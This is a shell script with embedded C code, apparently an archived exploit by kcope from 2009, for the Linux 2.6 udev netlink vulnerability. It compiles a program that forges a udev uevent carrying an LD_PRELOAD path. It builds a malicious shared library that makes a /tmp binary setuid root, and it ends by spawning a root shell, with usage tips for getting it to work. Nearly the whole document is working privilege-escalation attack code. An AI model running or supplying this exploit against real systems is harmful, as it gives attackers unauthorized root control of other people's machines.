1
#!/bin/sh
2
# Linux 2.6
3
# bug found by Sebastian Krahmer
4
#
5
# lame sploit using LD technique
6
# by kcope in 2009
7
# tested on debian-etch,ubuntu,gentoo
8
# do a 'cat /proc/net/netlink'
9
# and set the first arg to this
10
# script to the pid of the netlink socket
11
# (the pid is udevd_pid - 1 most of the time)
12
# + sploit has to be UNIX formatted text :)
13
# + if it doesn't work the 1st time try more often
14
#
15
# WARNING: maybe needs some FIXUP to work flawlessly
116 collapsed lines
16
## greetz fly out to alex,andi,adize,wY!,revo,j! and the gang
17

18
cat > udev.c << _EOF
19
#include <fcntl.h>
20
#include <stdio.h>
21
#include <string.h>
22
#include <stdlib.h>
23
#include <unistd.h>
24
#include <dirent.h>
25
#include <sys/stat.h>
26
#include <sysexits.h>
27
#include <wait.h>
28
#include <signal.h>
29
#include <sys/socket.h>
30
#include <linux/types.h>
31
#include <linux/netlink.h>
32

33
#ifndef NETLINK_KOBJECT_UEVENT
34
#define NETLINK_KOBJECT_UEVENT 15
35
#endif
36

37
#define SHORT_STRING 64
38
#define MEDIUM_STRING 128
39
#define BIG_STRING 256
40
#define LONG_STRING 1024
41
#define EXTRALONG_STRING 4096
42
#define TRUE 1
43
#define FALSE 0
44

45
int socket_fd;
46
struct sockaddr_nl address;
47
struct msghdr msg;
48
struct iovec iovector;
49
int sz = 64*1024;
50

51
main(int argc, char **argv) {
52
        char sysfspath[SHORT_STRING];
53
        char subsystem[SHORT_STRING];
54
        char event[SHORT_STRING];
55
        char major[SHORT_STRING];
56
        char minor[SHORT_STRING];
57

58
        sprintf(event, "add");
59
        sprintf(subsystem, "block");
60
        sprintf(sysfspath, "/dev/foo");
61
        sprintf(major, "8");
62
        sprintf(minor, "1");
63

64
        memset(&address, 0, sizeof(address));
65
        address.nl_family = AF_NETLINK;
66
        address.nl_pid = atoi(argv[1]);
67
        address.nl_groups = 0;
68

69
        msg.msg_name = (void*)&address;
70
        msg.msg_namelen = sizeof(address);
71
        msg.msg_iov = &iovector;
72
        msg.msg_iovlen = 1;
73

74
        socket_fd = socket(AF_NETLINK, SOCK_DGRAM, NETLINK_KOBJECT_UEVENT);
75
        bind(socket_fd, (struct sockaddr *) &address, sizeof(address));
76

77
        char message[LONG_STRING];
78
        char *mp;
79

80
        mp = message;
81
        mp += sprintf(mp, "%s@%s", event, sysfspath) +1;
82
        mp += sprintf(mp, "ACTION=%s", event) +1;
83
        mp += sprintf(mp, "DEVPATH=%s", sysfspath) +1;
84
        mp += sprintf(mp, "MAJOR=%s", major) +1;
85
        mp += sprintf(mp, "MINOR=%s", minor) +1;
86
        mp += sprintf(mp, "SUBSYSTEM=%s", subsystem) +1;
87
        mp += sprintf(mp, "LD_PRELOAD=/tmp/libno_ex.so.1.0") +1;
88

89
        iovector.iov_base = (void*)message;
90
        iovector.iov_len = (int)(mp-message);
91

92
        char *buf;
93
        int buflen;
94
        buf = (char *) &msg;
95
        buflen = (int)(mp-message);
96

97
        sendmsg(socket_fd, &msg, 0);
98

99
        close(socket_fd);
100

101
 sleep(10);
102
 execl("/tmp/suid", "suid", (void*)0);
103
}
104

105
_EOF
106
gcc udev.c -o /tmp/udev
107
cat > program.c << _EOF
108
#include <unistd.h>
109
#include <stdio.h>
110
#include <sys/types.h>
111
#include <stdlib.h>
112

113
void _init()
114
{
115
 setgid(0);
116
 setuid(0);
117
 unsetenv("LD_PRELOAD");
118
 execl("/bin/sh","sh","-c","chown root:root /tmp/suid; chmod +s /tmp/suid",NULL);
119
}
120

121
_EOF
122
gcc -o program.o -c program.c -fPIC
123
gcc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles
124
cat > suid.c << _EOF
125
int main(void) {
126
       setgid(0); setuid(0);
127
       execl("/bin/sh","sh",0); }
128
_EOF
129
gcc -o /tmp/suid suid.c
130
cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0
131
/tmp/udev $1